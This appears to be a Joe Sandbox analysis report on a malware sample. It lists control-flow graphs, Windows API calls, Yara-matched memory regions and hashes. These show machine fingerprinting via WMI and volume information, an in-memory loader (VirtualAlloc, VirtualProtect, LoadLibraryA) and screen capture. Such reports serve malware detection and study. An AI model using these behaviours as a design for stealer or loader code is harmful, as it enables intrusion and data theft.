                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 43b870-43b8af 1 43b8b0-43b95c 0->1 1->1 2 43b962-43b97f 1->2 3 43b980-43b9a4 2->3 3->3 4 43b9a6-43b9ef 3->4 5 43b9f0-43ba04 4->5 5->5 6 43ba06-43ba28 5->6 8 43bb5b-43bb6f 6->8 9 43ba2e-43ba46 6->9 10 43bb70-43bb8a 8->10 11 43ba50-43bae4 9->11 10->10 12 43bb8c-43bbef 10->12 11->11 13 43baea-43bb0f 11->13 14 43bbf0-43bc11 12->14 15 43bb10-43bb3e 13->15 14->14 16 43bc13-43bc6f 14->16 15->15 17 43bb40-43bb57 15->17 18 43bc70-43bc84 16->18 17->8 18->18 19 43bc86-43bcd4 CoCreateInstance 18->19 20 43c217-43c247 call 441c40 GetVolumeInformationW 19->20 21 43bcda-43bd1f 19->21 26 43c251-43c253 20->26 27 43c249-43c24d 20->27 23 43bd20-43bd3f 21->23 23->23 25 43bd41-43bd6c SysAllocString 23->25 32 43bd72-43bd8c CoSetProxyBlanket 25->32 33 43c206-43c213 SysFreeString 25->33 28 43c26d-43c274 26->28 27->26 30 43c276-43c27d 28->30 31 43c28d-43c2af 28->31 30->31 34 43c27f-43c28b 30->34 35 43c2b0-43c2c4 31->35 36 43bd92-43bdb2 32->36 37 43c1fc-43c202 32->37 33->20 34->31 35->35 38 43c2c6-43c309 35->38 39 43bdc0-43bde6 36->39 37->33 40 43c310-43c351 38->40 39->39 41 43bde8-43be72 SysAllocString 39->41 40->40 42 43c353-43c37f call 41dcb0 40->42 43 43be80-43becd 41->43 48 43c380-43c388 42->48 43->43 44 43becf-43bef7 SysAllocString 43->44 50 43c1e7-43c1f8 SysFreeString * 2 44->50 51 43befd-43bf1f 44->51 48->48 49 43c38a-43c38c 48->49 52 43c392-43c3a2 call 4081e0 49->52 53 43c260-43c267 49->53 50->37 58 43bf25-43bf28 51->58 59 43c1dd-43c1e3 51->59 52->53 53->28 55 43c3a7-43c3ae 53->55 58->59 60 43bf2e-43bf33 58->60 59->50 60->59 61 43bf39-43bf89 VariantInit 60->61 62 43bf90-43bfaf 61->62 62->62 63 43bfb1-43bfc2 62->63 64 43bfc6-43bfcb 63->64 65 43bfd1-43bfd7 64->65 66 43c1cc-43c1d9 VariantClear 64->66 65->66 67 43bfdd-43bfea 65->67 66->59 68 43c033 67->68 69 43bfec-43bff1 67->69 71 43c035-43c04f call 408160 68->71 70 43c00c-43c010 69->70 72 43c012-43c01d 70->72 73 43c000 70->73 80 43c055-43c05f 71->80 81 43c17e-43c18f 71->81 76 43c026-43c02c 72->76 77 43c01f-43c024 72->77 75 43c001-43c00a 73->75 75->70 75->71 76->75 79 43c02e-43c031 76->79 77->75 79->75 80->81 82 43c065-43c06f 80->82 83 43c191 81->83 84 43c196-43c1a2 81->84 87 43c070-43c07e 82->87 83->84 85 43c1a4 84->85 86 43c1a9-43c1c9 call 408190 call 408170 84->86 85->86 86->66 89 43c090-43c096 87->89 90 43c080-43c085 87->90 91 43c098-43c09b 89->91 92 43c0bd-43c0c9 89->92 94 43c130-43c134 90->94 91->92 95 43c09d-43c0bb 91->95 96 43c0cb-43c0ce 92->96 97 43c148-43c150 92->97 99 43c136-43c13c 94->99 95->94 96->97 100 43c0d0-43c121 96->100 97->99 103 43c152-43c155 97->103 99->81 102 43c13e-43c140 99->102 100->94 102->87 104 43c146 102->104 105 43c157-43c178 103->105 106 43c17a-43c17c 103->106 104->81 105->94 106->94
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                                                • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                                • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                • API String ID: 1810270423-2807872674
                                                                                                • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                                                • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
                                                                                                • API String ID: 0-3642574725
                                                                                                • Opcode ID: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
                                                                                                • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                                                • Opcode Fuzzy Hash: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
                                                                                                • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 580 408880-408891 call 43fba0 583 408ab5-408ab7 ExitProcess 580->583 584 408897-40889e call 4385b0 580->584 587 408ab0 call 440240 584->587 588 4088a4-4088c8 GetCurrentProcessId GetCurrentThreadId 584->588 587->583 589 4088ca-4088cc 588->589 590 4088ce-408972 SHGetSpecialFolderPathW GetForegroundWindow 588->590 589->590 592 408974-408997 590->592 593 408999-4089a8 590->593 592->593 594 4089b0-4089c4 593->594 594->594 595 4089c6-4089f2 call 43eb20 594->595 598 408a00-408a3b 595->598 599 408a74-408a92 call 409ce0 598->599 600 408a3d-408a72 598->600 603 408a94 call 40cdd0 599->603 604 408a9e-408aa5 599->604 600->598 607 408a99 call 40ba80 603->607 604->587 605 408aa7-408aad call 408170 604->605 605->587 607->604
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                                                • GetForegroundWindow.USER32 ref: 0040896A
                                                                                                • ExitProcess.KERNEL32 ref: 00408AB7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                • String ID: 6W01
                                                                                                • API String ID: 4063528623-326071965
                                                                                                • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                                                • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 750 40aa32-40aa35 751 40aa82 750->751 752 40aa37-40aa5f 750->752 753 40aa60-40aa72 752->753 753->753 754 40aa74-40aa7b 753->754 757 40aa00-40aa12 754->757 757->757 758 40aa14-40aa2e 757->758
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: MO$MO
                                                                                                • API String ID: 0-3148518880
                                                                                                • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                                                • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 492 76003c-760047 493 76004c-760263 call 760a3f call 760e0f call 760d90 VirtualAlloc 492->493 494 760049 492->494 509 760265-760289 call 760a69 493->509 510 76028b-760292 493->510 494->493 515 7602ce-7603c2 VirtualProtect call 760cce call 760ce7 509->515 512 7602a1-7602b0 510->512 514 7602b2-7602cc 512->514 512->515 514->512 521 7603d1-7603e0 515->521 522 7603e2-760437 call 760ce7 521->522 523 760439-7604b8 VirtualFree 521->523 522->521 525 7605f4-7605fe 523->525 526 7604be-7604cd 523->526 529 760604-76060d 525->529 530 76077f-760789 525->530 528 7604d3-7604dd 526->528 528->525 534 7604e3-760505 LoadLibraryA 528->534 529->530 535 760613-760637 529->535 532 7607a6-7607b0 530->532 533 76078b-7607a3 530->533 536 7607b6-7607cb 532->536 537 76086e-7608be LoadLibraryA 532->537 533->532 538 760517-760520 534->538 539 760507-760515 534->539 540 76063e-760648 535->540 541 7607d2-7607d5 536->541 545 7608c7-7608f9 537->545 542 760526-760547 538->542 539->542 540->530 543 76064e-76065a 540->543 546 7607d7-7607e0 541->546 547 760824-760833 541->547 548 76054d-760550 542->548 543->530 544 760660-76066a 543->544 551 76067a-760689 544->551 553 760902-76091d 545->553 554 7608fb-760901 545->554 555 7607e4-760822 546->555 556 7607e2 546->556 552 760839-76083c 547->552 549 760556-76056b 548->549 550 7605e0-7605ef 548->550 557 76056f-76057a 549->557 558 76056d 549->558 550->528 559 760750-76077a 551->559 560 76068f-7606b2 551->560 552->537 561 76083e-760847 552->561 554->553 555->541 556->547 562 76057c-760599 557->562 563 76059b-7605bb 557->563 558->550 559->540 564 7606b4-7606ed 560->564 565 7606ef-7606fc 560->565 566 76084b-76086c 561->566 567 760849 561->567 575 7605bd-7605db 562->575 563->575 564->565 569 7606fe-760748 565->569 570 76074b 565->570 566->552 567->537 569->570 570->551 575->548
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0076024D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID: cess$kernel32.dll
                                                                                                • API String ID: 4275171209-1230238691
                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction ID: e7592e7f84c55ea775e29d54004374ecd9913ce804cec6b547e91cec81f2d018
                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction Fuzzy Hash: 3B527974A00229DFDB64CF58C984BA9BBB1BF09304F1480D9E90EAB351DB34AE94DF54

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 686 40e3d3-40e540 CoInitializeEx * 2
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                                                • Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
                                                                                                • Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                                                • Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 687 5407a6-5407bf 688 5407c1-5407c3 687->688 689 5407c5 688->689 690 5407ca-5407d6 CreateToolhelp32Snapshot 688->690 689->690 691 5407e6-5407f3 Module32First 690->691 692 5407d8-5407de 690->692 693 5407f5-5407f6 call 540465 691->693 694 5407fc-540804 691->694 692->691 697 5407e0-5407e4 692->697 698 5407fb 693->698 697->688 697->691 698->694
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005407CE
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 005407EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674790752.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_540000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: 0cf283d98efe61e3cd9481b54c82bc3f55ec36781a81dceacc3b71ca884935ef
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: BBF062311017116BD7203AB5988DAAF7AE8FF89769F201528E742910C0DA74F8454A62

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 700 760e0f-760e24 SetErrorMode * 2 701 760e26 700->701 702 760e2b-760e2c 700->702 701->702
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,00760223,?,?), ref: 00760E19
                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,00760223,?,?), ref: 00760E1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction ID: 39821a217816a7f5344c70d646fc942040b13633ca22255bef99017fbef1404d
                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction Fuzzy Hash: 89D0123154512877D7003A94DC09BCE7B1CDF05B62F008411FB0DD9080C775994046E5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 760 440260-440271 761 4402a5-4402a6 call 43eb40 760->761 762 440286-440298 call 441850 RtlReAllocateHeap 760->762 763 440278-44027f 760->763 764 44029a-4402a3 call 43eb20 760->764 770 4402ab-4402ae 761->770 771 4402b0-4402b2 762->771 763->761 763->762 764->771 770->771
                                                                                                APIs
                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B9C7,00000000,00000001), ref: 00440292
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                • Instruction ID: c7e132dbbf166c87dd4ca7ba8e526d96017081e21b1d4d371130b4eff19db060
                                                                                                • Opcode Fuzzy Hash: e3ca6a36a028ff54866f16376779860b9096701dd45936173a9f18f59b7a354d
                                                                                                • Instruction Fuzzy Hash: C3E02B32404310ABD2026F397C06B177674EFC6715F05087AF50156151DB38F811C5DE

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 772 40df92-40dfdb CoInitializeSecurity
                                                                                                APIs
                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 640775948-0
                                                                                                • Opcode ID: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
                                                                                                • Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
                                                                                                • Opcode Fuzzy Hash: c197b67b38e7a9dfb84c75cb0c47c94d45024fd2fc4afd10e6e7abe74b422134
                                                                                                • Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 773 40ab12-40ab5b call 441c40 * 2 WSAStartup
                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID:
                                                                                                • API String ID: 724789610-0
                                                                                                • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                                                • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                                                • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                                                • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                                                • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 004404BF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-0
                                                                                                • Opcode ID: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
                                                                                                • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                                                • Opcode Fuzzy Hash: 6f507deb5e1f19d761a5d5784f4b45f47d149ac39b8a1577dd60edd7b15305f7
                                                                                                • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1674712770.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_3B5A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                                                • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                                                • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005404B6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674790752.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_540000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: 50dd362a1b8c8ae9f1864809fe64922e881f4706fdd5c4cbaf7c294925ff0706
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: 6B112B79A40208EFDB01DF98C985E98BFF5AF08350F158094FA489B362D375EA50DF80
                                                                                                APIs
                                                                                                • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0079BF33
                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0079BFAD
                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0079BFEB
                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0079C050
                                                                                                • SysAllocString.OLEAUT32(37C935C6), ref: 0079C137
                                                                                                • VariantInit.OLEAUT32(?), ref: 0079C1A5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_760000_3B5A.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                • API String ID: 65563702-2807872674
                                                                                                • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                • Instruction ID: 6f5f04b4b5aedd121f75cae4873818d8ff07ee97e1d2c1e30ee8c038fad91261
                                                                                                • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                                                • Instruction Fuzzy Hash: 3452E0726083408BDB24CF68D8917AFBBE1EFC5314F188A2DE5959B391D778D806CB52
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 00436989
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                • DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1674712770.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
